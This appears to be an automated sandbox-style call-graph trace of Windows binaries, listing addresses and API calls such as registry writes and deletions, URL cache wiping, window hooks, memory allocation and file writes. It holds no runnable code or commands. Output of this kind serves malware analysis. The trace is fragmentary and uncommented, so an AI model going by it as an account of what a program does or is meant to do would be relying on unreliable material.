88289->88274 88290->88289 88291->88274 88292->88264 88293->88268 88303 6a6dbaf0 88294->88303 88301->88280 88304 6a6dbb28 _memset 88303->88304 88317 6a6db9c0 WSAStartup 88304->88317 88306 6a6dbb37 _memset 88306->88306 88324 6a6df3b0 6 API calls ___ansicp 88306->88324 88308 6a6dbb74 88318 6a6dba42 88317->88318 88319 6a6dba2b gethostname 88317->88319 88322 6a6fd7eb ___ansicp 5 API calls 88318->88322 88319->88318 88320 6a6dba3c 88319->88320 88326 6a6fecba 102 API calls 2 library calls 88320->88326 88323 6a6dba95 88322->88323 88323->88306 88324->88308 88326->88318 88327 6a6e3850 88330 6a6e3874 _memset 88327->88330 88332 6a6e3928 88327->88332 88328 6a6fd7eb ___ansicp 5 API calls 88329 6a6e393e 88328->88329 88337 6a6e6090 88330->88337 88332->88328 88338 6a6e4600 110 API calls 88337->88338 88339 6a6e60c6 88338->88339 88340 6a6e4600 110 API calls 88339->88340 88341 6a6e60d8 88340->88341 88342 6a6e4600 110 API calls 88341->88342 88343 6a6e60eb 88342->88343 88352 6a6de9c0 88343->88352 88346 6a6e4340 80 API calls 88347 6a6e6124 88346->88347 88355 6a6e5e60 88347->88355 88379 6a6de940 88352->88379 88380 6a6de94c 88379->88380 88381 6a6de956 88379->88381 88394 6a6dea00 80 API calls ctype 88380->88394 88395 6a6ff235 67 API calls __vscwprintf_helper 88381->88395 88384 6a6de963 88385 6a6de986 88384->88385 88387 6a6de890 ctype 80 API calls 88384->88387 88396 6a6ff03d 101 API calls __vsprintf_s_l 88385->88396 88387->88385 88388 6a6de994 88389 6a6de9a2 88388->88389 88397 6a6dea00 80 API calls ctype 88388->88397 88389->88346 88395->88384 88396->88388 88556 40b480 _memset _memset 88557 40b300 2 API calls 88556->88557 88558 40b4d9 _memset _strlen 88557->88558 88559 413a70 88558->88559 88560 40b51c _strlen 88559->88560 88561 40b5c1 _strlen 88560->88561 88562 40b536 88560->88562 88565 40b5a2 88561->88565 88563 40b57a _strlen 88562->88563 88566 46c1c6 8 API calls __strupr_s_l 88563->88566 88566->88565 88567 40f600 88570 409a40 88567->88570 88571 409a49 88570->88571 88572 408640 Sleep 88571->88572 88573 409a51 88572->88573 88574 409a66 88573->88574 88575 409a5a IWBE 88573->88575 88576 409a64 88574->88576 88577 409a6f SPEP 88574->88577 88575->88574 88575->88576 88577->88576 88578 40bc01 88579 40bc0c 88578->88579 88580 46a7e7 _malloc 4 API calls 88579->88580 88581 40bc1d 88580->88581 88582 410080 88583 410099 88582->88583 88584 4254e0 5 API calls 88583->88584 88585 410115 88584->88585 88588 426d70 88585->88588 88587 410191 88589 426d82 88588->88589 88590 445e71 7 API calls 88589->88590 88591 426dda 88590->88591 88594 453f1f 88591->88594 88593 426ded 88593->88587 88596 44488f 2 API calls 88594->88596 88595 453f3f 88595->88593 88596->88595 88597 411200 88598 411211 88597->88598 88609 449479 88598->88609 88600 411221 88601 449479 ShowWindow 88600->88601 88602 411231 88601->88602 88603 449479 ShowWindow 88602->88603 88604 411241 88603->88604 88605 449479 ShowWindow 88604->88605 88606 411251 88605->88606 88607 449479 ShowWindow 88606->88607 88608 411261 88607->88608 88610 449494 88609->88610 88611 449484 ShowWindow 88609->88611 88611->88600 88612 41ea00 88613 41ea15 88612->88613 88615 41ea13 88612->88615 88616 41e210 88613->88616 88617 41e225 88616->88617 88663 424300 88617->88663 88620 424300 13 API calls 88621 41e532 SendMessageA 88620->88621 88622 41e5b4 88621->88622 88623 41e578 88621->88623 88625 424300 13 API calls 88622->88625 88624 424300 13 API calls 88623->88624 88626 41e5b2 88624->88626 88625->88626 88675 4216d0 88626->88675 88628 41e61c 88629 41e651 88628->88629 88630 41e6f2 88628->88630 88664 424338 88663->88664 88669 42436f codecvt 88663->88669 88665 424350 _strlen 88664->88665 88666 424347 88664->88666 88665->88666 88667 404740 codecvt 7 API calls 88666->88667 88667->88669 88668 445e71 7 API calls 88670 424389 88668->88670 88669->88668 88671 453f1f 2 API calls 88670->88671 88672 42439c 88671->88672 88673 4243a0 SendMessageA 88672->88673 88674 41e4f0 88672->88674 88673->88674 88674->88620 88676 421600 12 API calls 88675->88676 88677 4216f9 88676->88677 88677->88628 88693 411280 88694 411291 88693->88694 88695 449479 ShowWindow 88694->88695 88696 4112a1 88695->88696 88697 449479 ShowWindow 88696->88697 88698 4112b1 88697->88698 88699 449479 ShowWindow 88698->88699 88700 4112c1 88699->88700 88701 449479 ShowWindow 88700->88701 88702 4112d1 88701->88702 88703 410680 88704 41069a 88703->88704 88705 4254e0 5 API calls 88704->88705 88706 41071c 88705->88706 88707 42c880 SetWindowTextA 88708 42c8a0 task 88707->88708 88709 408889 88710 408827 RegSetValueExA 88709->88710 88711 408835 88710->88711 88712 45cf0c 88713 45cf17 88712->88713 88715 45cf2a 88713->88715 88716 44a5b1 KiUserExceptionDispatcher task 88713->88716 88717 be9baa4 88720 be9ba3c 88717->88720 88726 be9511c 88720->88726 88723 be9ba61 FindClose 88724 be9ba95 88723->88724 88725 be9ba70 FileTimeToLocalFileTime FileTimeToDosDateTime 88723->88725 88725->88724 88727 be95120 FindFirstFileA 88726->88727 88727->88723 88727->88724 88728 6a6d6920 88731 6a6ef452 88728->88731 88732 6a6ef45c 88731->88732 88738 6a6ef7fa GetModuleFileNameA 88732->88738 88734 6a6d6925 88736 6a6ef473 InterlockedExchange 88736->88734 88739 6a6ef85c 88738->88739 88740 6a6ef82c 88738->88740 88743 6a6fd7eb ___ansicp 5 API calls 88739->88743 88740->88739 88741 6a6ef830 PathFindExtensionA 88740->88741 88746 6a6ef58b 88741->88746 88744 6a6ef466 88743->88744 88744->88734 88745 6a6ef30e 110 API calls ctype 88744->88745 88745->88736 88768 6a70183d 88746->88768 88748 6a6ef59a GetModuleHandleA GetProcAddress 88749 6a6ef688 GetModuleHandleA 88748->88749 88750 6a6ef5e3 ConvertDefaultLocale ConvertDefaultLocale GetProcAddress 88748->88750 88751 6a6ef6f8 GetModuleFileNameA 88749->88751 88752 6a6ef693 EnumResourceLanguagesA 88749->88752 88750->88751 88757 6a6ef64a ConvertDefaultLocale ConvertDefaultLocale 88750->88757 88754 6a6ef73b _memset 88751->88754 88767 6a6ef733 88751->88767 88752->88751 88753 6a6ef6b9 ConvertDefaultLocale ConvertDefaultLocale 88752->88753 88753->88751 88769 6a6eedf6 88754->88769 88757->88751 88763 6a6ef79f 88766 6a6ef7de 88763->88766 88780 6a6ef35b 88763->88780 88805 6a6ef42d DeactivateActCtx ReleaseActCtx 88766->88805 88804 6a7018c0 5 API calls ___ansicp 88767->88804 88768->88748 88770 6a6eeea8 88769->88770 88771 6a6eee18 GetModuleHandleA 88769->88771 88776 6a6eeead 88770->88776 88772 6a6eee30 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88771->88772 88774 6a6eee2b 88771->88774 88772->88774 88775 6a6eee9e 88774->88775 88806 6a6ee232 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 88774->88806 88775->88770 88777 6a6eeebe 88776->88777 88778 6a6eeec2 88776->88778 88777->88763 88778->88777 88779 6a6eeed1 CreateActCtxA 88778->88779 88779->88777 88781 6a6ef39d GetLocaleInfoA 88780->88781 88782 6a6ef385 88780->88782 88783 6a6ef41d 88781->88783 88786 6a6ef392 ctype 88781->88786 88810 6a6fe796 67 API calls __cftof2_l 88782->88810 88805->88767 88806->88772 88810->88786 88846 40888e 88851 408897 88846->88851 88847 408945 RegEnumKeyExA 88848 4088b3 88847->88848 88847->88851 88849 4089b8 RegQueryValueExA 88849->88851 88851->88847 88851->88848 88851->88849 88852 408670 _memset 88851->88852 88853 6a6e28a0 88854 6a6e28db _memset 88853->88854 88855 6a6e2915 WSAStartup 88854->88855 88856 6a6e292c gethostname 88855->88856 88864 6a6e2988 _memset 88855->88864 88857 6a6e2944 88856->88857 88858 6a6e2982 WSACleanup 88856->88858 88893 6a6fecba 102 API calls 2 library calls 88857->88893 88858->88864 88860 6a6e299d 88862 6a6fd7eb ___ansicp 5 API calls 88860->88862 88861 6a6e2951 88894 6a6fecba 102 API calls 2 library calls 88861->88894 88863 6a6e29b0 88862->88863 88864->88860 88878 6a6e2730 88864->88878 88866 6a6e296e _realloc 88866->88858 88869 6a6e2a16 _memset _realloc 88870 6a6fde00 _sprintf 103 API calls 88869->88870 88871 6a6e2a79 88870->88871 88886 6a6e25d0 88871->88886 88879 6a6e276b _memset 88878->88879 88895 6a6e3640 88879->88895 88882 6a6e3640 103 API calls 88883 6a6e282e _realloc 88882->88883 88884 6a6fd7eb ___ansicp 5 API calls 88883->88884 88885 6a6e288d 88884->88885 88885->88860 88885->88869 88887 6a6e25e3 88886->88887 88888 6a6e25f7 88887->88888 88889 6a6fe0d8 __wfopen_s 161 API calls 88887->88889 88889->88888 88893->88861 88894->88866 88896 6a6e3650 88895->88896 88897 6a6fde00 _sprintf 103 API calls 88896->88897 88898 6a6e281a 88897->88898 88898->88882 88900 bef4ca0 88901 bef4ca6 88900->88901 88903 bef4cc3 88901->88903 88904 beb1bcc GetClassInfoA 88901->88904 88905 beb1bfc 88904->88905 88906 beb1c25 88905->88906 88907 beb1c1b RegisterClassA 88905->88907 88908 beb1c0a UnregisterClassA 88905->88908 88914 be97c58 CreateWindowExA 88906->88914 88907->88906 88908->88907 88910 beb1c53 88911 beb1c70 88910->88911 88915 beb1b10 88910->88915 88911->88903 88913 beb1c67 SetWindowLongA 88913->88911 88914->88910 88916 beb1b20 VirtualAlloc 88915->88916 88917 beb1b4e 88915->88917 88916->88917 88917->88913 88918 40a590 88919 40a5ab 88918->88919 88920 40a5b6 RegDeleteValueA 88919->88920 88921 40a5b4 88919->88921 88920->88921 88922 40f610 88925 40a370 FindFirstUrlCacheEntryA 88922->88925 88926 40a3cb 88925->88926 88927 40a3f0 DeleteUrlCacheEntry FindNextUrlCacheEntryA 88926->88927 88928 40a423 88926->88928 88927->88928 88929 412b10 88930 412b28 88929->88930 88931 412b3a 88930->88931 88933 420a30 88930->88933 88934 420a44 88933->88934 88935 449479 ShowWindow 88934->88935 88937 420a52 88934->88937 88935->88937 88939 42f5d0 88937->88939 88938 420a90 88938->88931 88940 42f5e2 88939->88940 88942 42f5a9 88939->88942 88941 42f62b ShowWindow 88940->88941 88940->88942 88943 42f63f 88940->88943 88941->88942 88942->88938 88947 42f750 88943->88947 88945 42f715 88945->88942 88946 42f72c ShowWindow 88945->88946 88946->88942 88950 42f769 88947->88950 88949 42f77d codecvt 88949->88945 88950->88949 88951 4200b0 RtlAllocateHeap RtlFreeHeap __amsg_exit RtlAllocateHeap 88950->88951 88951->88950 88952 42fd10 88955 41e140 _memset 88952->88955 88954 42fd2f 88956 41dd70 88955->88956 88957 41e1a1 DialogBoxIndirectParamA 88956->88957 88960 41e070 88957->88960 88959 41e1f7 88959->88954 88961 41e0a4 88960->88961 88970 4242b0 5 API calls codecvt 88961->88970 88963 41e0d3 88971 4242b0 5 API calls codecvt 88963->88971 88965 41e0e1 88972 4242b0 5 API calls codecvt 88965->88972 88967 41e0ef 88973 4467e5 __EH_prolog3 KiUserExceptionDispatcher ctype ~_Task_impl 88967->88973 88969 41e113 88969->88959 88970->88963 88971->88965 88972->88967 88973->88969 88974 bef1d34 88975 bef1d42 88974->88975 89022 bef1d71 88975->89022 89024 be9b6d8 88975->89024 88980 be94c80 11 API calls 88982 bef1fc7 88980->88982 88984 be94c80 11 API calls 88982->88984 88983 bef1da7 89042 be94fdc 88983->89042 88985 bef1fe2 88984->88985 89022->88980 89025 be9b6e8 89024->89025 89026 be9b709 89025->89026 89051 be9b1e4 42 API calls 89025->89051 89028 beeba00 89026->89028 89029 beeba25 89028->89029 89031 beeba56 89029->89031 89058 bea0140 13 API calls 89029->89058 89052 be94cb0 89031->89052 89032 beeba4b 89034 be94cf4 11 API calls 89032->89034 89034->89031 89036 be94c80 11 API calls 89037 beeba7a 89036->89037 89038 be94cf4 89037->89038 89040 be94cf8 89038->89040 89039 be94d1c 89039->88983 89040->89039 89066 be92dec 11 API calls 89040->89066 89043 be94fed 89042->89043 89044 be9502a 89043->89044 89045 be95013 89043->89045 89047 be94d20 11 API calls 89044->89047 89067 be952a8 11 API calls 89045->89067 89051->89026 89053 be94cb4 89052->89053 89056 be94cc4 89052->89056 89053->89056 89059 be94d20 89053->89059 89054 be94cf2 89054->89036 89056->89054 89064 be92dec 11 API calls 89056->89064 89058->89032 89060 be94d48 89059->89060 89061 be94d24 89059->89061 89060->89056 89065 be92dbc 11 API calls 89061->89065 89063 be94d31 89063->89056 89064->89054 89065->89063 89066->89039 89068 446798 89069 4467a6 89068->89069 89071 4467ab 89068->89071 89070 4467d0 NtdllDefWindowProc_A 89070->89069 89071->89070 89072 4467be 89071->89072 89074 4466a5 __EH_prolog3_catch 89072->89074 89083 455e53 __EH_prolog3 89074->89083 89076 4466c0 89078 4466d7 89076->89078 89093 44a5b1 KiUserExceptionDispatcher task 89076->89093 89087 443bc6 89078->89087 89081 446757 89081->89069 89085 455e6d 89083->89085 89086 455ead 89085->89086 89095 44a5b1 KiUserExceptionDispatcher task 89085->89095 89086->89076 89096 445dcb 89087->89096 89103 447fb3 __EH_prolog3 89087->89103 89088 443bea 89089 443c01 89088->89089 89173 443aa3 89088->89173 89089->89081 89094 44662f 7 API calls 89089->89094 89094->89081 89097 455e53 task 2 API calls 89096->89097 89098 445ddf 89097->89098 89099 445de8 89098->89099 89178 44a5b1 KiUserExceptionDispatcher task 89098->89178 89102 443aa3 2 API calls 89099->89102 89101 445dfb 89101->89088 89102->89101 89104 447ffd 89103->89104 89105 447fdb 89103->89105 89106 447fe9 89104->89106 89108 445e71 7 API calls 89104->89108 89111 44803a 89104->89111 89179 4473c4 89105->89179 89107 448027 89106->89107 89148 447ff1 89106->89148 89264 444710 KiUserExceptionDispatcher 89107->89264 89108->89111 89110 4481cf 89110->89088 89111->89148 89189 4446dc 89111->89189 89113 44856d 89117 4481b4 89119 4480fb 89119->89107 89119->89117 89121 448209 89119->89121 89122 448215 89119->89122 89123 4483d3 89119->89123 89124 448325 89119->89124 89125 4483a6 89119->89125 89126 448361 89119->89126 89127 4483e1 89119->89127 89128 4482e3 89119->89128 89129 4483f5 89119->89129 89130 448231 89119->89130 89131 4483b3 89119->89131 89135 44834b 89119->89135 89136 448539 89119->89136 89138 4481e9 89119->89138 89141 448319 89119->89141 89144 44820f 89119->89144 89119->89148 89152 44823f 89119->89152 89262 444710 KiUserExceptionDispatcher 89119->89262 89129->89144 89268 444710 KiUserExceptionDispatcher 89148->89268 89174 443ad4 CallWindowProcA 89173->89174 89176 443ab2 89173->89176 89175 443ae7 89174->89175 89175->89089 89176->89174 89177 443ac0 NtdllDefWindowProc_A 89176->89177 89177->89175 89180 447415 89179->89180 89185 4473e4 89179->89185 89181 455e53 task 2 API calls 89180->89181 89183 447424 89181->89183 89182 4473e8 89182->89106 89184 44742d 89183->89184 89276 44a5b1 KiUserExceptionDispatcher task 89183->89276 89184->89182 89277 446a0f 5 API calls 2 library calls 89184->89277 89185->89182 89269 442a86 89185->89269 89191 4446ee 89189->89191 89190 444706 89284 454fe9 89190->89284 89191->89190 89288 44a5b1 KiUserExceptionDispatcher task 89191->89288 89194 44470c 89194->89119 89261 444710 KiUserExceptionDispatcher 89194->89261 89261->89119 89262->89119 89264->89110 89268->89113 89270 442ac4 89269->89270 89271 442a96 89269->89271 89270->89271 89274 442b45 89270->89274 89273 442aa6 89271->89273 89282 44a5b1 KiUserExceptionDispatcher task 89271->89282 89273->89182 89274->89273 89278 44294e 89274->89278 89277->89185 89280 44295a 89278->89280 89281 44296a 89280->89281 89283 44a5b1 KiUserExceptionDispatcher task 89280->89283 89281->89273 89285 454ff9 89284->89285 89287 454ffe 89284->89287 89289 44a5b1 KiUserExceptionDispatcher task 89285->89289 89287->89194 89440 be97034 89441 be9703f 89440->89441 89444 be94878 89441->89444 89443 be97079 89446 be948be 89444->89446 89445 be9493c 89445->89443 89448 be94afc 89445->89448 89451 be94b0d 89445->89451 89446->89445 89456 be94808 89446->89456 89461 be94a3c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 89448->89461 89450 be94b06 89450->89451 89452 be94b52 FreeLibrary 89451->89452 89453 be94b76 89451->89453 89452->89451 89454 be94b7f 89453->89454 89455 be94b85 ExitProcess 89453->89455 89454->89455 89457 be9481d 89456->89457 89458 be94853 89456->89458 89457->89458 89462 be96170 89457->89462 89466 be985d0 89457->89466 89458->89445 89461->89450 89463 be96180 GetModuleFileNameA 89462->89463 89465 be9619c 89462->89465 89470 be96404 GetModuleFileNameA RegOpenKeyExA 89463->89470 89465->89457 89489 be98564 89466->89489 89468 be985db VirtualAlloc 89469 be985f9 89468->89469 89469->89457 89471 be96486 89470->89471 89472 be96446 RegOpenKeyExA 89470->89472 89488 be9622c 12 API calls 89471->89488 89472->89471 89473 be96464 RegOpenKeyExA 89472->89473 89473->89471 89475 be9650f lstrcpyn GetThreadLocale GetLocaleInfoA 89473->89475 89477 be9663f 89475->89477 89478 be96546 89475->89478 89476 be964ab RegQueryValueExA 89479 be964cb RegQueryValueExA 89476->89479 89480 be964e9 RegCloseKey 89476->89480 89477->89465 89478->89477 89481 be96556 lstrlen 89478->89481 89479->89480 89480->89465 89483 be9656f 89481->89483 89483->89477 89484 be965c9 89483->89484 89485 be9659d lstrcpyn LoadLibraryExA 89483->89485 89484->89477 89486 be965d3 lstrcpyn LoadLibraryExA 89484->89486 89485->89484 89486->89477 89487 be96609 lstrcpyn LoadLibraryExA 89486->89487 89487->89477 89488->89476 89490 be98504 89489->89490 89490->89468 89491 6a6e1330 89492 6a6e1356 89491->89492 89493 6a6fde00 _sprintf 103 API calls 89492->89493 89494 6a6e1366 RegOpenKeyA 89493->89494 89495 6a6e13ba RegSetValueExA 89494->89495 89496 6a6e1381 RegCreateKeyA 89494->89496 89498 6a6e14dd RegCloseKey 89495->89498 89499 6a6e13e7 RegSetValueExA 89495->89499 89496->89495 89497 6a6e1399 RegCloseKey 89496->89497 89500 6a6fd7eb ___ansicp 5 API calls 89497->89500 89501 6a6fd7eb ___ansicp 5 API calls 89498->89501 89499->89498 89502 6a6e140e RegSetValueExA 89499->89502 89503 6a6e13b3 89500->89503 89504 6a6e14f9 89501->89504 89502->89498 89505 6a6e1431 89502->89505 89505->89505 89506 6a6e143d RegSetValueExA 89505->89506 89507 6a6e1478 RegSetValueExA 89506->89507 89508 6a6e1455 RegCloseKey 89506->89508 89512 6a6e149f RegCloseKey 89507->89512 89513 6a6e14c2 RegSetValueExA 89507->89513 89509 6a6fd7eb ___ansicp 5 API calls 89508->89509 89510 6a6e1471 89509->89510 89514 6a6fd7eb ___ansicp 5 API calls 89512->89514 89513->89498 89515 6a6e1500 RegCloseKey 89513->89515 89516 6a6e14bb 89514->89516 89518 6a6fd7eb ___ansicp 5 API calls 89515->89518 89519 6a6e152f 89518->89519 89520 421020 89523 421060 89520->89523 89522 421051 89524 421085 89523->89524 89525 42108a _memset 89523->89525 89524->89522 89527 4210dd _strlen 89525->89527 89528 4210ef 89525->89528 89527->89528 89528->89524 89530 46c9aa _LocaleUpdate::_LocaleUpdate _strncpy _memset __mbsnbcpy_l 89528->89530 89530->89524 89531 4832ac 89532 4832ed 89531->89532 89543 466de2 89532->89543 89536 48335d 89537 483335 89538 483339 89537->89538 89563 44ac2d 89537->89563 89569 44a7e5 89537->89569 89574 466976 10 API calls 89538->89574 89544 466dee SetErrorMode SetErrorMode 89543->89544 89545 466dff 89544->89545 89575 454640 89545->89575 89547 466e0f 89548 44addb SetWindowsHookExA 89547->89548 89549 466e42 89547->89549 89548->89549 89549->89538 89550 407ef0 89549->89550 89559 44cfbb 89549->89559 89551 44cfbb 11 API calls 89550->89551 89552 407f01 89551->89552 89583 44e85f 89552->89583 89554 407f08 89555 407f1a _strlen 89554->89555 89556 407f2a 89554->89556 89555->89556 89557 4428ed ctype 4 API calls 89556->89557 89558 407f54 89557->89558 89558->89537 89560 44cfc5 89559->89560 89588 44d34f 89560->89588 89561 44cfcf 89561->89537 89564 44abe7 89563->89564 89570 44a7f7 89569->89570 89571 44a811 PeekMessageA 89570->89571 89572 44a839 89570->89572 89644 44cd86 89570->89644 89571->89570 89571->89572 89572->89538 89574->89536 89578 454544 89575->89578 89577 45465e 89577->89547 89579 45454d 89578->89579 89581 454566 89578->89581 89579->89581 89582 44a5b1 KiUserExceptionDispatcher task 89579->89582 89581->89577 89584 44e886 89583->89584 89585 44e86c 89583->89585 89584->89554 89585->89584 89587 44a5b1 KiUserExceptionDispatcher task 89585->89587 89589 44d37c 89588->89589 89590 44d3b1 89589->89590 89592 44d0e0 __EH_prolog3_GS 89589->89592 89590->89561 89593 44d0f8 89592->89593 89594 44d197 89593->89594 89595 44d140 ConvertDefaultLocale ConvertDefaultLocale 89593->89595 89596 44d290 _memset 89594->89596 89598 44d288 89594->89598 89595->89594 89605 44c9fe 89596->89605 89598->89590 89607 44ca20 89605->89607 89697 6a6edf85 89698 6a6edff7 89697->89698 89699 6a6edf90 89697->89699 89701 6a6ee02d 89698->89701 89702 6a6edffd 89698->89702 89725 6a6f3359 89699->89725 89708 6a6edfd8 89701->89708 89744 6a6f4224 89701->89744 89704 6a6f3911 ctype 110 API calls 89702->89704 89707 6a6ee002 89704->89707 89712 6a6f4224 110 API calls 89707->89712 89715 6a6ee015 89712->89715 89719 6a6f443c 111 API calls 89715->89719 89721 6a6ee01c 89719->89721 89778 6a6f46ca 113 API calls ctype 89721->89778 89726 6a6f3fbd ctype 104 API calls 89725->89726 89727 6a6edf9d 89726->89727 89728 6a6f4906 SetErrorMode SetErrorMode 89727->89728 89729 6a6f3911 ctype 110 API calls 89728->89729 89730 6a6f4923 89729->89730 89780 6a6f30b8 89730->89780 89733 6a6f3911 ctype 110 API calls 89734 6a6f4938 89733->89734 89735 6a6f4955 89734->89735 89788 6a6f4780 89734->89788 89737 6a6f3911 ctype 110 API calls 89735->89737 89738 6a6f495a 89737->89738 89739 6a6f4966 GetModuleHandleA 89738->89739 89740 6a6f4961 89738->89740 89855 6a6f3944 89744->89855 89747 6a6f443c 89748 6a6f3944 ctype 110 API calls 89747->89748 89750 6a6f4448 89748->89750 89749 6a6f44aa 89752 6a6f3911 ctype 110 API calls 89749->89752 89750->89749 89751 6a6f4473 89750->89751 89775 6a6ee03f 89750->89775 89868 6a6f0208 110 API calls ctype 89750->89868 89869 6a6f4369 LocalAlloc RaiseException moneypunct ctype 89751->89869 89755 6a6f44b0 89752->89755 89863 6a6f3a5f 89755->89863 89756 6a6f448a 89870 6a6f4369 LocalAlloc RaiseException moneypunct ctype 89756->89870 89759 6a6f4492 89871 6a6f4369 LocalAlloc RaiseException moneypunct ctype 89759->89871 89761 6a6f44bd 89762 6a6f44d4 89761->89762 89761->89775 89874 6a7033ec 68 API calls 5 library calls 89761->89874 89762->89775 89763 6a6f449a 89779 6a6f0261 118 API calls 2 library calls 89775->89779 89778->89708 89779->89708 89812 6a6f2fbc 89780->89812 89783 6a6f30fe 89785 6a6f3105 SetLastError 89783->89785 89787 6a6f3112 89783->89787 89784 6a6fd7eb ___ansicp 5 API calls 89786 6a6f31b2 89784->89786 89785->89787 89786->89733 89787->89784 89789 6a6f3911 ctype 110 API calls 89788->89789 89790 6a6f479f GetModuleFileNameA 89789->89790 89791 6a6f47c7 89790->89791 89813 6a6f3029 GetModuleFileNameW 89812->89813 89814 6a6f2fc5 GetModuleHandleA 89812->89814 89813->89783 89813->89787 89815 6a6f2fde GetProcAddress GetProcAddress GetProcAddress GetProcAddress 89814->89815 89816 6a6f2fd9 89814->89816 89815->89813 89818 6a6ee232 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 89816->89818 89818->89815 89856 6a6f3911 ctype 110 API calls 89855->89856 89857 6a6f3949 89856->89857 89860 6a6ef572 89857->89860 89861 6a6f3fbd ctype 104 API calls 89860->89861 89862 6a6ee038 89861->89862 89862->89747 89864 6a6f3a76 89863->89864 89865 6a6f3a65 89863->89865 89864->89761 89865->89864 89866 6a6f39c8 ctype 4 API calls 89865->89866 89867 6a6f3a75 89866->89867 89867->89761 89868->89751 89869->89756 89870->89759 89871->89763 89874->89762 89877 46b02b 89880 477ee0 89877->89880 89879 46b07c 89881 477f03 __CallSettingFrame@12 89880->89881 89884 4386f0 89881->89884 89882 477f07 __CallSettingFrame@12 89882->89879 89885 404700 codecvt 4 API calls 89884->89885 89886 438701 89885->89886 89886->89882 89887 6a6d2100 89888 6a6d213b 89887->89888 89889 6a6d2109 _strncpy 89887->89889 89889->89888 89891 6a6e0900 89889->89891 89892 6a6fde00 _sprintf 103 API calls 89891->89892 89893 6a6e09df CreateFileA 89892->89893 89894 6a6e0a16 89893->89894 89895 6a6e0a00 GetFileSize 89893->89895 89899 6a6fd7eb ___ansicp 5 API calls 89894->89899 89896 6a6e0a0f CloseHandle 89895->89896 89897 6a6e0a1d SetFilePointer ReadFile 89895->89897 89896->89894 89897->89896 89898 6a6e0a51 _memset 89897->89898 89901 6a6fde00 _sprintf 103 API calls 89898->89901 89900 6a6e0b5f 89899->89900 89900->89888 89902 6a6e0aa8 89901->89902 89903 6a6e0b0a SetFilePointer 89902->89903 89904 6a6e0b22 SetFilePointer 89902->89904 89905 6a6e0b38 WriteFile FlushFileBuffers CloseHandle 89903->89905 89904->89905 89905->89894 89906 407630 89907 407636 PeekMessageA 89906->89907 89908 407662 89907->89908 89909 40764c DispatchMessageA 89907->89909 89910 407660 89909->89910 89910->89907 89911 405330 90111 404f50 89911->90111 90113 404f5e 90111->90113 90112 404fc1 90212 404e60 90112->90212 90113->90112 90228 406bf0 90113->90228 90118 4049d0 _memcpy_s 90119 404fa3 90118->90119 90231 404ce0 5 API calls codecvt 90119->90231 90121 40503d 90123 404e60 18 API calls 90121->90123 90122 404fb9 90232 404e40 ks_exit 90122->90232 90127 40504e 90123->90127 90124 406bf0 15 API calls 90125 405006 90124->90125 90128 4049d0 _memcpy_s 90125->90128 90129 404e60 18 API calls 90127->90129 90130 40501f 90128->90130 90135 405066 90129->90135 90233 404ce0 5 API calls codecvt 90130->90233 90132 405035 90234 404e40 ks_exit 90132->90234 90134 4050d1 90136 404e60 18 API calls 90134->90136 90135->90134 90137 406bf0 15 API calls 90135->90137 90138 4050e1 90136->90138 90139 40509a 90137->90139 90141 404e60 18 API calls 90138->90141 90140 4049d0 _memcpy_s 90139->90140 90142 4050b3 90140->90142 90143 4050fa 90141->90143 90235 404ce0 5 API calls codecvt 90142->90235 90145 404e60 18 API calls 90143->90145 90147 405113 90145->90147 90146 4050c9 90236 404e40 ks_exit 90146->90236 90149 404e60 18 API calls 90147->90149 90214 404e74 90212->90214 90213 404f3b 90213->90121 90213->90124 90214->90213 90215 404eab 90214->90215 90216 406bf0 15 API calls 90214->90216 90217 404ed0 90215->90217 90218 406bf0 15 API calls 90215->90218 90216->90215 90219 404ef5 90217->90219 90221 406bf0 15 API calls 90217->90221 90218->90217 90220 4049d0 _memcpy_s 90219->90220 90222 404f0e 90220->90222 90221->90219 90237 404ce0 5 API calls codecvt 90222->90237 90224 404f24 90238 404e40 ks_exit 90224->90238 90226 404f2c 90227 404700 codecvt 4 API calls 90226->90227 90227->90213 90239 406c20 90228->90239 90230 404f8a 90230->90118 90231->90122 90232->90112 90233->90132 90234->90121 90235->90146 90236->90134 90237->90224 90238->90226 90241 406c2f codecvt _vwprintf 90239->90241 90240 406c85 90245 46a2a8 90240->90245 90241->90240 90242 404930 codecvt 5 API calls 90241->90242 90242->90240 90244 406cab codecvt 90244->90230 90248 46a220 90245->90248 90247 46a2c0 90247->90244 90249 46a24a 90248->90249 90251 46a22d 90248->90251 90249->90251 90252 46a154 14 API calls __flsbuf 90249->90252 90251->90247 90252->90251 90256 40a7b0 90257 408640 Sleep 90256->90257 90258 40a7c8 90257->90258 90259 40a7d1 IWBE 90258->90259 90260 40a7e2 _memset 90258->90260 90259->90260 90261 40a7db 90259->90261 90260->90261 90262 420230 90265 420280 90262->90265 90270 448c48 90265->90270 90269 420274 90271 448c58 90270->90271 90272 448c9f 90271->90272 90274 448c76 90271->90274 90273 448cae __snwprintf_s 90272->90273 90276 448ccf 90273->90276 90275 448c85 __snwprintf_s 90274->90275 90275->90276 90277 420296 90276->90277 90288 448bbb 9 API calls 90276->90288 90281 4501cd 90277->90281 90279 448d3b 90279->90277 90289 450e48 KiUserExceptionDispatcher task 90279->90289 90282 44488f 2 API calls 90281->90282 90283 4501f9 90282->90283 90284 44e85f KiUserExceptionDispatcher 90283->90284 90287 45023c 90283->90287 90285 450207 90284->90285 90290 45a8a8 90285->90290 90287->90269 90288->90279 90291 45a8be 90290->90291 90294 45a19b 90291->90294 90295 45a1ab 90294->90295 90297 45a1de 90294->90297 90295->90297 90298 459f72 90295->90298 90297->90287 90301 459e37 __EH_prolog3_catch 90298->90301 90302 459e66 90301->90302 90311 44aab7 90312 44aac3 90311->90312 90317 44a6b7 __EH_prolog3_catch 90312->90317 90314 44aaf1 90315 46fe34 14 API calls 90314->90315 90316 44aaf9 90315->90316 90318 44a6cc 90317->90318 90319 456fe0 6 API calls 90318->90319 90320 44a6d3 90319->90320 90320->90314 90321 46e333 90322 472b4f ___set_flsgetvalue 2 API calls 90321->90322 90323 46e33d 90322->90323 90324 472b2f ___fls_getvalue@4 TlsGetValue 90323->90324 90325 46e348 90324->90325 90326 46e36b 90325->90326 90329 46e34c ___fls_setvalue@8 90325->90329 90397 472d57 7 API calls 3 library calls 90326->90397 90328 46e386 __IsNonwritableInCurrentImage 90365 46e2f2 90328->90365 90329->90328 90332 46e2f7 90329->90332 90333 46e30d 90332->90333 90341 432d20 90332->90341 90349 432e20 90332->90349 90355 437880 90332->90355 90377 46e2a9 